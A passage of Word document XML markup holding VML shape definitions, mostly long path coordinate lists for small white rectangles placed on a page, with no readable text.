6729,4856,6732,4856,6735,4856,6738,4856,6741,4856,6744,4856,6747,4856,6750,4856,6754,4856,6757,4856,6761,4856,6764,4856,6768,4856,6771,4856,6775,4856,6779,4856,6783,4856,6787,4856,6791,4856,6796,4856,6800,4856,6804,4856,6809,4856,6813,4856,6818,4856,6823,4856,6828,4856,6833,4856,6838,4856,6843,4856,6848,4856,6853,4856,6859,4856,6864,4856,6870,4856,6876,4856,6882,4856,6888,4856,6894,4856,6900,4856,6906,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4855,6912,4855,6912,4855,6912,4855,6912,4855,6912,4854,6912,4854,6912,4854,6912,4854,6912,4853,6912,4853,6912,4853,6912,4852,6912,4852,6912,4851,6912,4851,6912,4850,6912,4850,6912,4849,6912,4849,6912,4848,6912,4847,6912,4847,6912,4846,6912,4845,6912,4844,6912,4843,6912,4843,6912,4842,6912,4841,6912,4840,6912,4839,6912,4838,6912,4836,6912,4835,6912,4834,6912,4833,6912,4831,6912,4830,6912,4829,6912,4827,6912,4826,6912,4824,6912,4822,6912,4821,6912,4819,6912,4817,6912,4815,6912,4814,6912,4812,6912,4810,6912,4808,6912,4805,6912,4803,6912,4801,6912,4799,6912,4796,6912,4794,6912,4791,6912,4789,6912,4786,6912,4783,6912,4781,6912,4778,6912,4775,6912,4772,6912,4769,6912,4766,6912,4763,6912,4759,6912,4756,6912,4753,6912,4749,6912,4745,6912,4742,6912,4738,6912,4734,6912,4730,6912,4726,6912,4722,6912,4718,6912,4714,6912,4710,6912,4705,6912,4701,6912,4696,6912,4691,6912,4687,6912,4682,6912,4677,6912,4672,6912,4667,6912,4662,6912,4656,6912,4651,6912,4645,6912,4640,6912,4634,6912,4628,6912,4622,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6912,4616,6911,4616,6911,4616,6911,4616,6911,4616,6911,4616,6910,4616,6910,4616,6910,4616,6910,4616,6909,4616,6909,4616,6908,4616,6908,4616,6908,4616,6907,4616,6907,4616,6906,4616,6905,4616,6905,4616,6904,4616,6904,4616,6903,4616,6902,4616,6901,4616,6900,4616,6900,4616,6899,4616,6898,4616,6897,4616,6896,4616,6895,4616,6894,4616,6892,4616,6891,4616,6890,4616,6889,4616,6887,4616,6886,4616,6884,4616,6883,4616,6881,4616,6880,4616,6878,4616,6876,4616,6875,4616,6873,4616,6871,4616,6869,4616,6867,4616,6865,4616,6863,4616,6861,4616,6858,4616,6856,4616,6854,4616,6851,4616,6849,4616,6846,4616,6843,4616,6841,4616,6838,4616,6835,4616,6832,4616,6829,4616,6826,4616,6823,4616,6820,4616,6816,4616,6813,4616,6809,4616,6806,4616,6802,4616,6798,4616,6795,4616,6791,4616,6787,4616,6783,4616,6779,4616,6774,4616,6770,4616,6766,4616,6761,4616,6756,4616,6752,4616,6747,4616,6742,4616,6737,4616,6732,4616,6727,4616,6722,4616,6716,4616,6711,4616,6705,4616,6700,4616,6694,4616,6688,4616,6682,4616,6676,4616,6670,4616,6664,4616,6657e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:241.500pt;margin-top:331.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4830,6630" coordsize="130,270">
        <v:shape style="position:absolute;left:4830;top:6630;width:130;height:270" coordorigin="4830,6630" coordsize="130,270" path="m4856,6657l4856,6657,4856,6657,4856,6657,4856,6657,4856,6657,4856,6657,4856,6657,4856,6657,4856,6657,4856,6657,4857,6657,4857,6657,4857,6657,4857,6657,4857,6657,4857,6657,4857,6657,4857,6657,4857,6657,4857,6657,4857,6657,4857,6657,4857,6657,4857,6657,4857,6657,4858,6657,4858,6657,4858,6657,4858,6657,4858,6657,4858,6657,4859,6657,4859,6657,4859,6657,4859,6657,4860,6657,4860,6657,4860,6657,4860,6657,4861,6657,4861,6657,4861,6657,4862,6657,4862,6657,4863,6657,4863,6657,4863,6657,4864,6657,4864,6657,4865,6657,4865,6657,4866,6657,4866,6657,4867,6657,4868,6657,4868,6657,4869,6657,4870,6657,4870,6657,4871,6657,4872,6657,4873,6657,4873,6657,4874,6657,4875,6657,4876,6657,4877,6657,4878,6657,4879,6657,4880,6657,4881,6657,4882,6657,4883,6657,4884,6657,4885,6657,4887,6657,4888,6657,4889,6657,4890,6657,4892,6657,4893,6657,4894,6657,4896,6657,4897,6657,4899,6657,4900,6657,4902,6657,4903,6657,4905,6657,4907,6657,4908,6657,4910,6657,4912,6657,4914,6657,4916,6657,4918,6657,4919,6657,4921,6657,4924,6657,4926,6657,4928,6657,4930,6657,4932,6657,4934,6657,4937,6657,4939,6657,4941,6657,4944,6657,4946,6657,4949,6657,4951,6657,4954,6657,4957,6657,4959,6657,4962,6657,4965,6657,4968,6657,4971,6657,4974,6657,4977,6657,4977,6657,4977,6657,4977,6657,4977,6657,4977,6657,4977,6657,4977,6657,4977,6657,4977,6657,4977,6657,4977,6658,4977,6658,4977,6658,4977,6658,4977,6658,4977,6658,4977,6658,4977,6658,4977,6658,4977,6658,4977,6659,4977,6659,4977,6659,4977,6659,4977,6659,4977,6660,4977,6660,4977,6660,4977,6661,4977,6661,4977,6661,4977,6662,4977,6662,4977,6663,4977,6663,4977,6664,4977,6664,4977,6665,4977,6666,4977,6666,4977,6667,4977,6668,4977,6669,4977,6669,4977,6670,4977,6671,4977,6672,4977,6673,4977,6674,4977,6675,4977,6676,4977,6677,4977,6679,4977,6680,4977,6681,4977,6683,4977,6684,4977,6685,4977,6687,4977,6688,4977,6690,4977,6692,4977,6693,4977,6695,4977,6697,4977,6699,4977,6701,4977,6703,4977,6705,4977,6707,4977,6709,4977,6712,4977,6714,4977,6716,4977,6719,4977,6721,4977,6724,4977,6726,4977,6729,4977,6732,4977,6735,4977,6738,4977,6741,4977,6744,4977,6747,4977,6750,4977,6754,4977,6757,4977,6761,4977,6764,4977,6768,4977,6771,4977,6775,4977,6779,4977,6783,4977,6787,4977,6791,4977,6796,4977,6800,4977,6804,4977,6809,4977,6813,4977,6818,4977,6823,4977,6828,4977,6833,4977,6838,4977,6843,4977,6848,4977,6853,4977,6859,4977,6864,4977,6870,4977,6876,4977,6882,4977,6888,4977,6894,4977,6900,4977,6906,4977,6912,4977,6912,4977,6912,4977,6912,4977,6912,4977,6912,4976,6912,4976,6912,4976,6912,4976,6912,4976,6912,4976,6912,4976,6912,4976,6912,4976,6912,4976,6912,4976,6912,4976,6912,4976,6912,4976,6912,4976,6912,4976,6912,4976,6912,4976,6912,4976,6912,4976,6912,4975,6912,4975,6912,4975,6912,4975,6912,4975,6912,4975,6912,4974,6912,4974,6912,4974,6912,4974,6912,4973,6912,4973,6912,4973,6912,4973,6912,4972,6912,4972,6912,4972,6912,4971,6912,4971,6912,4970,6912,4970,6912,4970,6912,4969,6912,4969,6912,4968,6912,4968,6912,4967,6912,4966,6912,4966,6912,4965,6912,4965,6912,4964,6912,4963,6912,4963,6912,4962,6912,4961,6912,4960,6912,4960,6912,4959,6912,4958,6912,4957,6912,4956,6912,4955,6912,4954,6912,4953,6912,4952,6912,4951,6912,4950,6912,4949,6912,4948,6912,4946,6912,4945,6912,4944,6912,4943,6912,4941,6912,4940,6912,4939,6912,4937,6912,4936,6912,4934,6912,4933,6912,4931,6912,4930,6912,4928,6912,4926,6912,4925,6912,4923,6912,4921,6912,4919,6912,4917,6912,4915,6912,4913,6912,4911,6912,4909,6912,4907,6912,4905,6912,4903,6912,4901,6912,4899,6912,4896,6912,4894,6912,4892,6912,4889,6912,4887,6912,4884,6912,4882,6912,4879,6912,4876,6912,4874,6912,4871,6912,4868,6912,4865,6912,4862,6912,4859,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6912,4856,6911,4856,6911,4856,6911,4856,6911,4856,6911,4856,6910,4856,6910,4856,6910,4856,6910,4856,6909,4856,6909,4856,6908,4856,6908,4856,6908,4856,6907,4856,6907,4856,6906,4856,6905,4856,6905,4856,6904,4856,6904,4856,6903,4856,6902,4856,6901,4856,6900,4856,6900,4856,6899,4856,6898,4856,6897,4856,6896,4856,6895,4856,6894,4856,6892,4856,6891,4856,6890,4856,6889,4856,6887,4856,6886,4856,6884,4856,6883,4856,6881,4856,6880,4856,6878,4856,6876,4856,6875,4856,6873,4856,6871,4856,6869,4856,6867,4856,6865,4856,6863,4856,6861,4856,6858,4856,6856,4856,6854,4856,6851,4856,6849,4856,6846,4856,6843,4856,6841,4856,6838,4856,6835,4856,6832,4856,6829,4856,6826,4856,6823,4856,6820,4856,6816,4856,6813,4856,6809,4856,6806,4856,6802,4856,6798,4856,6795,4856,6791,4856,6787,4856,6783,4856,6779,4856,6774,4856,6770,4856,6766,4856,6761,4856,6756,4856,6752,4856,6747,4856,6742,4856,6737,4856,6732,4856,6727,4856,6722,4856,6716,4856,6711,4856,6705,4856,6700,4856,6694,4856,6688,4856,6682,4856,6676,4856,6670,4856,6664,4856,6657e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:253.500pt;margin-top:331.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5070,6630" coordsize="250,270">
        <v:shape style="position:absolute;left:5070;top:6630;width:250;height:270" coordorigin="5070,6630" coordsize="250,270" path="m5097,6657l5097,6657,5097,6657,5097,6657,5097,6657,5097,6657,5097,6657,5097,6657,5097,6657,5097,6657,5097,6657,5097,6657,5097,6657,5097,6657,5097,6657,5097,6657,5097,6657,5097,6657,5097,6657,5097,6657,5098,6657,5098,6657,5098,6657,5098,6657,5098,6657,5099,6657,5099,6657,5099,6657,5099,6657,5100,6657,5100,6657,5100,6657,5101,6657,5101,6657,5102,6657,5102,6657,5103,6657,5103,6657,5104,6657,5104,6657,5105,6657,5106,6657,5106,6657,5107,6657,5108,6657,5109,6657,5110,6657,5110,6657,5111,6657,5112,6657,5113,6657,5114,6657,5115,6657,5117,6657,5118,6657,5119,6657,5120,6657,5122,6657,5123,6657,5124,6657,5126,6657,5127,6657,5129,6657,5131,6657,5132,6657,5134,6657,5136,6657,5138,6657,5139,6657,5141,6657,5143,6657,5145,6657,5148,6657,5150,6657,5152,6657,5154,6657,5157,6657,5159,6657,5162,6657,5164,6657,5167,6657,5170,6657,5172,6657,5175,6657,5178,6657,5181,6657,5184,6657,5187,6657,5190,6657,5194,6657,5197,6657,5200,6657,5204,6657,5208,6657,5211,6657,5215,6657,5219,6657,5223,6657,5227,6657,5231,6657,5235,6657,5239,6657,5243,6657,5248,6657,5252,6657,5257,6657,5262,6657,5266,6657,5271,6657,5276,6657,5281,6657,5286,6657,5291,6657,5297,6657,5302,6657,5308,6657,5313,6657,5319,6657,5325,6657,5331,6657,5337,6657,5337,6657,5337,6657,5337,6657,5337,6657,5337,6657,5337,6657,5337,6657,5337,6657,5337,6657,5337,6657,5337,6658,5337,6658,5337,6658,5337,6658,5337,6658,5337,6658,5337,6658,5337,6658,5337,6658,5337,6658,5337,6659,5337,6659,5337,6659,5337,6659,5337,6659,5337,6660,5337,6660,5337,6660,5337,6661,5337,6661,5337,6661,5337,6662,5337,6662,5337,6663,5337,6663,5337,6664,5337,6664,5337,6665,5337,6666,5337,6666,5337,6667,5337,6668,5337,6669,5337,6669,5337,6670,5337,6671,5337,6672,5337,6673,5337,6674,5337,6675,5337,6676,5337,6677,5337,6679,5337,6680,5337,6681,5337,6683,5337,6684,5337,6685,5337,6687,5337,6688,5337,6690,5337,6692,5337,6693,5337,6695,5337,6697,5337,6699,5337,6701,5337,6703,5337,6705,5337,6707,5337,6709,5337,6712,5337,6714,5337,6716,5337,6719,5337,6721,5337,6724,5337,6726,5337,6729,5337,6732,5337,6735,5337,6738,5337,6741,5337,6744,5337,6747,5337,6750,5337,6754,5337,6757,5337,6761,5337,6764,5337,6768,5337,6771,5337,6775,5337,6779,5337,6783,5337,6787,5337,6791,5337,6796,5337,6800,5337,6804,5337,6809,5337,6813,5337,6818,5337,6823,5337,6828,5337,6833,5337,6838,5337,6843,5337,6848,5337,6853,5337,6859,5337,6864,5337,6870,5337,6876,5337,6882,5337,6888,5337,6894,5337,6900,5337,6906,5337,6912,5337,6912,5337,6912,5337,6912,5337,6912,5337,6912,5337,6912,5337,6912,5337,6912,5337,6912,5337,6912,5337,6912,5336,6912,5336,6912,5336,6912,5336,6912,5336,6912,5336,6912,5336,6912,5336,6912,5336,6912,5336,6912,5335,6912,5335,6912,5335,6912,5335,6912,5334,6912,5334,6912,5334,6912,5334,6912,5333,6912,5333,6912,5332,6912,5332,6912,5332,6912,5331,6912,5331,6912,5330,6912,5329,6912,5329,6912,5328,6912,5328,6912,5327,6912,5326,6912,5325,6912,5325,6912,5324,6912,5323,6912,5322,6912,5321,6912,5320,6912,5319,6912,5318,6912,5317,6912,5315,6912,5314,6912,5313,6912,5312,6912,5310,6912,5309,6912,5307,6912,5306,6912,5304,6912,5303,6912,5301,6912,5299,6912,5298,6912,5296,6912,5294,6912,5292,6912,5290,6912,5288,6912,5286,6912,5284,6912,5281,6912,5279,6912,5277,6912,5274,6912,5272,6912,5269,6912,5266,6912,5264,6912,5261,6912,5258,6912,5255,6912,5252,6912,5249,6912,5246,6912,5243,6912,5240,6912,5236,6912,5233,6912,5229,6912,5226,6912,5222,6912,5218,6912,5215,6912,5211,6912,5207,6912,5203,6912,5198,6912,5194,6912,5190,6912,5185,6912,5181,6912,5176,6912,5172,6912,5167,6912,5162,6912,5157,6912,5152,6912,5147,6912,5142,6912,5136,6912,5131,6912,5126,6912,5120,6912,5114,6912,5108,6912,5103,6912,5097,6912,5097,6912,5097,6912,5097,6912,5097,6912,5097,6912,5097,6912,5097,6912,5097,6912,5097,6912,5097,6912,5097,6912,5097,6912,5097,6912,5097,6912,5097,6912,5097,6912,5097,6912,5097,6912,5097,6912,5097,6911,5097,6911,5097,6911,5097,6911,5097,6911,5097,6910,5097,6910,5097,6910,5097,6910,5097,6909,5097,6909,5097,6908,5097,6908,5097,6908,5097,6907,5097,6907,5097,6906,5097,6905,5097,6905,5097,6904,5097,6904,5097,6903,5097,6902,5097,6901,5097,6900,5097,6900,5097,6899,5097,6898,5097,6897,5097,6896,5097,6895,5097,6894,5097,6892,5097,6891,5097,6890,5097,6889,5097,6887,5097,6886,5097,6884,5097,6883,5097,6881,5097,6880,5097,6878,5097,6876,5097,6875,5097,6873,5097,6871,5097,6869,5097,6867,5097,6865,5097,6863,5097,6861,5097,6858,5097,6856,5097,6854,5097,6851,5097,6849,5097,6846,5097,6843,5097,6841,5097,6838,5097,6835,5097,6832,5097,6829,5097,6826,5097,6823,5097,6820,5097,6816,5097,6813,5097,6809,5097,6806,5097,6802,5097,6798,5097,6795,5097,6791,5097,6787,5097,6783,5097,6779,5097,6774,5097,6770,5097,6766,5097,6761,5097,6756,5097,6752,5097,6747,5097,6742,5097,6737,5097,6732,5097,6727,5097,6722,5097,6716,5097,6711,5097,6705,5097,6700,5097,6694,5097,6688,5097,6682,5097,6676,5097,6670,5097,6664,5097,6657e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:265.500pt;margin-top:331.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5310,6630" coordsize="250,270">
        <v:shape style="position:absolute;left:5310;top:6630;width:250;height:270" coordorigin="5310,6630" coordsize="250,270" path="m5337,6657l5337,6657,5337,6657,5337,6657,5337,6657,5337,6657,5337,6657,5337,6657,5337,6657,5337,6657,5337,6657,5337,6657,5337,6657,5337,6657,5337,6657,5337,6657,5337,6657,5337,6657,5337,6657,5338,6657,5338,6657,5338,6657,5338,6657,5338,6657,5338,6657,5339,6657,5339,6657,5339,6657,5339,6657,5340,6657,5340,6657,5341,6657,5341,6657,5341,6657,5342,6657,5342,6657,5343,6657,5343,6657,5344,6657,5345,6657,5345,6657,5346,6657,5347,6657,5347,6657,5348,6657,5349,6657,5350,6657,5351,6657,5351,6657,5352,6657,5353,6657,5354,6657,5356,6657,5357,6657,5358,6657,5359,6657,5360,6657,5362,6657,5363,6657,5364,6657,5366,6657,5367,6657,5369,6657,5371,6657,5372,6657,5374,6657,5376,6657,5378,6657,5380,6657,5381,6657,5383,6657,5386,6657,5388,6657,5390,6657,5392,6657,5394,6657,5397,6657,5399,6657,5402,6657,5404,6657,5407,6657,5410,6657,5412,6657,5415,6657,5418,6657,5421,6657,5424,6657,5427,6657,5431,6657,5434,6657,5437,6657,5441,6657,5444,6657,5448,6657,5451,6657,5455,6657,5459,6657,5463,6657,5467,6657,5471,6657,5475,6657,5479,6657,5483,6657,5488,6657,5492,6657,5497,6657,5502,6657,5506,6657,5511,6657,5516,6657,5521,6657,5526,6657,5532,6657,5537,6657,5542,6657,5548,6657,5553,6657,5559,6657,5565,6657,5571,6657,5577,6657,5577,6657,5577,6657,5577,6657,5577,6657,5577,6657,5577,6657,5577,6657,5577,6657,5577,6657,5577,6657,5577,6658,5577,6658,5577,6658,5577,6658,5577,6658,5577,6658,5577,6658,5577,6658,5577,6658,5577,6658,5577,6659,5577,6659,5577,6659,5577,6659,5577,6659,5577,6660,5577,6660,5577,6660,5577,6661,5577,6661,5577,6661,5577,6662,5577,6662,5577,6663,5577,6663,5577,6664,5577,6664,5577,6665,5577,6666,5577,6666,5577,6667,5577,6668,5577,6669,5577,6669,5577,6670,5577,6671,5577,6672,5577,6673,5577,6674,5577,6675,5577,6676,5577,6677,5577,6679,5577,6680,5577,6681,5577,6683,5577,6684,5577,6685,5577,6687,5577,6688,5577,6690,5577,6692,5577,6693,5577,6695,5577,6697,5577,6699,5577,6701,5577,6703,5577,6705,5577,6707,5577,6709,5577,6712,5577,6714,5577,6716,5577,6719,5577,6721,5577,6724,5577,6726,5577,6729,5577,6732,5577,6735,5577,6738,5577,6741,5577,6744,5577,6747,5577,6750,5577,6754,5577,6757,5577,6761,5577,6764,5577,6768,5577,6771,5577,6775,5577,6779,5577,6783,5577,6787,5577,6791,5577,6796,5577,6800,5577,6804,5577,6809,5577,6813,5577,6818,5577,6823,5577,6828,5577,6833,5577,6838,5577,6843,5577,6848,5577,6853,5577,6859,5577,6864,5577,6870,5577,6876,5577,6882,5577,6888,5577,6894,5577,6900,5577,6906,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5576,6912,5576,6912,5576,6912,5576,6912,5576,6912,5576,6912,5576,6912,5576,6912,5575,6912,5575,6912,5575,6912,5575,6912,5575,6912,5574,6912,5574,6912,5574,6912,5573,6912,5573,6912,5573,6912,5572,6912,5572,6912,5571,6912,5571,6912,5570,6912,5570,6912,5569,6912,5568,6912,5568,6912,5567,6912,5566,6912,5565,6912,5565,6912,5564,6912,5563,6912,5562,6912,5561,6912,5560,6912,5559,6912,5558,6912,5557,6912,5556,6912,5554,6912,5553,6912,5552,6912,5550,6912,5549,6912,5548,6912,5546,6912,5544,6912,5543,6912,5541,6912,5539,6912,5538,6912,5536,6912,5534,6912,5532,6912,5530,6912,5528,6912,5526,6912,5524,6912,5521,6912,5519,6912,5517,6912,5514,6912,5512,6912,5509,6912,5507,6912,5504,6912,5501,6912,5498,6912,5495,6912,5492,6912,5489,6912,5486,6912,5483,6912,5480,6912,5476,6912,5473,6912,5469,6912,5466,6912,5462,6912,5458,6912,5455,6912,5451,6912,5447,6912,5443,6912,5439,6912,5434,6912,5430,6912,5426,6912,5421,6912,5417,6912,5412,6912,5407,6912,5402,6912,5397,6912,5392,6912,5387,6912,5382,6912,5377,6912,5371,6912,5366,6912,5360,6912,5354,6912,5349,6912,5343,6912,5337,6912,5337,6912,5337,6912,5337,6912,5337,6912,5337,6912,5337,6912,5337,6912,5337,6912,5337,6912,5337,6912,5337,6912,5337,6912,5337,6912,5337,6912,5337,6912,5337,6912,5337,6912,5337,6912,5337,6912,5337,6911,5337,6911,5337,6911,5337,6911,5337,6911,5337,6910,5337,6910,5337,6910,5337,6910,5337,6909,5337,6909,5337,6908,5337,6908,5337,6908,5337,6907,5337,6907,5337,6906,5337,6905,5337,6905,5337,6904,5337,6904,5337,6903,5337,6902,5337,6901,5337,6900,5337,6900,5337,6899,5337,6898,5337,6897,5337,6896,5337,6895,5337,6894,5337,6892,5337,6891,5337,6890,5337,6889,5337,6887,5337,6886,5337,6884,5337,6883,5337,6881,5337,6880,5337,6878,5337,6876,5337,6875,5337,6873,5337,6871,5337,6869,5337,6867,5337,6865,5337,6863,5337,6861,5337,6858,5337,6856,5337,6854,5337,6851,5337,6849,5337,6846,5337,6843,5337,6841,5337,6838,5337,6835,5337,6832,5337,6829,5337,6826,5337,6823,5337,6820,5337,6816,5337,6813,5337,6809,5337,6806,5337,6802,5337,6798,5337,6795,5337,6791,5337,6787,5337,6783,5337,6779,5337,6774,5337,6770,5337,6766,5337,6761,5337,6756,5337,6752,5337,6747,5337,6742,5337,6737,5337,6732,5337,6727,5337,6722,5337,6716,5337,6711,5337,6705,5337,6700,5337,6694,5337,6688,5337,6682,5337,6676,5337,6670,5337,6664,5337,6657e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:277.500pt;margin-top:331.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5550,6630" coordsize="250,270">
        <v:shape style="position:absolute;left:5550;top:6630;width:250;height:270" coordorigin="5550,6630" coordsize="250,270" path="m5577,6657l5577,6657,5577,6657,5577,6657,5577,6657,5577,6657,5577,6657,5577,6657,5577,6657,5577,6657,5577,6657,5577,6657,5577,6657,5577,6657,5577,6657,5577,6657,5577,6657,5577,6657,5578,6657,5578,6657,5578,6657,5578,6657,5578,6657,5578,6657,5579,6657,5579,6657,5579,6657,5579,6657,5580,6657,5580,6657,5580,6657,5581,6657,5581,6657,5581,6657,5582,6657,5582,6657,5583,6657,5583,6657,5584,6657,5585,6657,5585,6657,5586,6657,5587,6657,5587,6657,5588,6657,5589,6657,5590,6657,5591,6657,5592,6657,5593,6657,5594,6657,5595,6657,5596,6657,5597,6657,5598,6657,5599,6657,5601,6657,5602,6657,5603,6657,5605,6657,5606,6657,5608,6657,5609,6657,5611,6657,5612,6657,5614,6657,5616,6657,5618,6657,5620,6657,5622,6657,5624,6657,5626,6657,5628,6657,5630,6657,5632,6657,5635,6657,5637,6657,5639,6657,5642,6657,5644,6657,5647,6657,5650,6657,5653,6657,5655,6657,5658,6657,5661,6657,5664,6657,5667,6657,5671,6657,5674,6657,5677,6657,5681,6657,5684,6657,5688,6657,5691,6657,5695,6657,5699,6657,5703,6657,5707,6657,5711,6657,5715,6657,5719,6657,5724,6657,5728,6657,5733,6657,5737,6657,5742,6657,5747,6657,5751,6657,5756,6657,5761,6657,5766,6657,5772,6657,5777,6657,5782,6657,5788,6657,5794,6657,5799,6657,5805,6657,5811,6657,5817,6657,5817,6657,5817,6657,5817,6657,5817,6657,5817,6657,5817,6657,5817,6657,5817,6657,5817,6657,5817,6657,5817,6658,5817,6658,5817,6658,5817,6658,5817,6658,5817,6658,5817,6658,5817,6658,5817,6658,5817,6658,5817,6659,5817,6659,5817,6659,5817,6659,5817,6659,5817,6660,5817,6660,5817,6660,5817,6661,5817,6661,5817,6661,5817,6662,5817,6662,5817,6663,5817,6663,5817,6664,5817,6664,5817,6665,5817,6666,5817,6666,5817,6667,5817,6668,5817,6669,5817,6669,5817,6670,5817,6671,5817,6672,5817,6673,5817,6674,5817,6675,5817,6676,5817,6677,5817,6679,5817,6680,5817,6681,5817,6683,5817,6684,5817,6685,5817,6687,5817,6688,5817,6690,5817,6692,5817,6693,5817,6695,5817,6697,5817,6699,5817,6701,5817,6703,5817,6705,5817,6707,5817,6709,5817,6712,5817,6714,5817,6716,5817,6719,5817,6721,5817,6724,5817,6726,5817,6729,5817,6732,5817,6735,5817,6738,5817,6741,5817,6744,5817,6747,5817,6750,5817,6754,5817,6757,5817,6761,5817,6764,5817,6768,5817,6771,5817,6775,5817,6779,5817,6783,5817,6787,5817,6791,5817,6796,5817,6800,5817,6804,5817,6809,5817,6813,5817,6818,5817,6823,5817,6828,5817,6833,5817,6838,5817,6843,5817,6848,5817,6853,5817,6859,5817,6864,5817,6870,5817,6876,5817,6882,5817,6888,5817,6894,5817,6900,5817,6906,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5817,6912,5816,6912,5816,6912,5816,6912,5816,6912,5816,6912,5816,6912,5816,6912,5815,6912,5815,6912,5815,6912,5815,6912,5814,6912,5814,6912,5814,6912,5813,6912,5813,6912,5813,6912,5812,6912,5812,6912,5811,6912,5811,6912,5810,6912,5810,6912,5809,6912,5808,6912,5808,6912,5807,6912,5806,6912,5806,6912,5805,6912,5804,6912,5803,6912,5802,6912,5801,6912,5800,6912,5799,6912,5798,6912,5797,6912,5796,6912,5794,6912,5793,6912,5792,6912,5791,6912,5789,6912,5788,6912,5786,6912,5785,6912,5783,6912,5781,6912,5780,6912,5778,6912,5776,6912,5774,6912,5772,6912,5770,6912,5768,6912,5766,6912,5764,6912,5761,6912,5759,6912,5757,6912,5754,6912,5752,6912,5749,6912,5747,6912,5744,6912,5741,6912,5738,6912,5735,6912,5732,6912,5729,6912,5726,6912,5723,6912,5720,6912,5716,6912,5713,6912,5710,6912,5706,6912,5702,6912,5699,6912,5695,6912,5691,6912,5687,6912,5683,6912,5679,6912,5674,6912,5670,6912,5666,6912,5661,6912,5657,6912,5652,6912,5647,6912,5642,6912,5637,6912,5632,6912,5627,6912,5622,6912,5617,6912,5611,6912,5606,6912,5600,6912,5595,6912,5589,6912,5583,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6912,5577,6911,5577,6911,5577,6911,5577,6911,5577,6911,5577,6910,5577,6910,5577,6910,5577,6910,5577,6909,5577,6909,5577,6908,5577,6908,5577,6908,5577,6907,5577,6907,5577,6906,5577,6905,5577,6905,5577,6904,5577,6904,5577,6903,5577,6902,5577,6901,5577,6900,5577,6900,5577,6899,5577,6898,5577,6897,5577,6896,5577,6895,5577,6894,5577,6892,5577,6891,5577,6890,5577,6889,5577,6887,5577,6886,5577,6884,5577,6883,5577,6881,5577,6880,5577,6878,5577,6876,5577,6875,5577,6873,5577,6871,5577,6869,5577,6867,5577,6865,5577,6863,5577,6861,5577,6858,5577,6856,5577,6854,5577,6851,5577,6849,5577,6846,5577,6843,5577,6841,5577,6838,5577,6835,5577,6832,5577,6829,5577,6826,5577,6823,5577,6820,5577,6816,5577,6813,5577,6809,5577,6806,5577,6802,5577,6798,5577,6795,5577,6791,5577,6787,5577,6783,5577,6779,5577,6774,5577,6770,5577,6766,5577,6761,5577,6756,5577,6752,5577,6747,5577,6742,5577,6737,5577,6732,5577,6727,5577,6722,5577,6716,5577,6711,5577,6705,5577,6700,5577,6694,5577,6688,5577,6682,5577,6676,5577,6670,5577,6664,5577,6657e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:289.500pt;margin-top:331.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5790,6630" coordsize="250,270">
        <v:shape style="position:absolute;left:5790;top:6630;width:250;height:270" coordorigin="5790,6630" coordsize="250,270" path="m5817,6657l5817,6657,5817,6657,5817,6657,5817,6657,5817,6657,5817,6657,5817,6657,5817,6657,5817,6657,5817,6657,5817,6657,5817,6657,5817,6657,5817,6657,5817,6657,5817,6657,5818,6657,5818,6657,5818,6657,5818,6657,5818,6657,5818,6657,5818,6657,5819,6657,5819,6657,5819,6657,5819,6657,5820,6657,5820,6657,5820,6657,5821,6657,5821,6657,5822,6657,5822,6657,5823,6657,5823,6657,5824,6657,5824,6657,5825,6657,5825,6657,5826,6657,5827,6657,5827,6657,5828,6657,5829,6657,5830,6657,5831,6657,5832,6657,5833,6657,5834,6657,5835,6657,5836,6657,5837,6657,5838,6657,5839,6657,5841,6657,5842,6657,5843,6657,5845,6657,5846,6657,5848,6657,5849,6657,5851,6657,5853,6657,5854,6657,5856,6657,5858,6657,5860,6657,5862,6657,5864,6657,5866,6657,5868,6657,5870,6657,5872,6657,5875,6657,5877,6657,5879,6657,5882,6657,5885,6657,5887,6657,5890,6657,5893,6657,5895,6657,5898,6657,5901,6657,5904,6657,5908,6657,5911,6657,5914,6657,5917,6657,5921,6657,5924,6657,5928,6657,5932,6657,5935,6657,5939,6657,5943,6657,5947,6657,5951,6657,5955,6657,59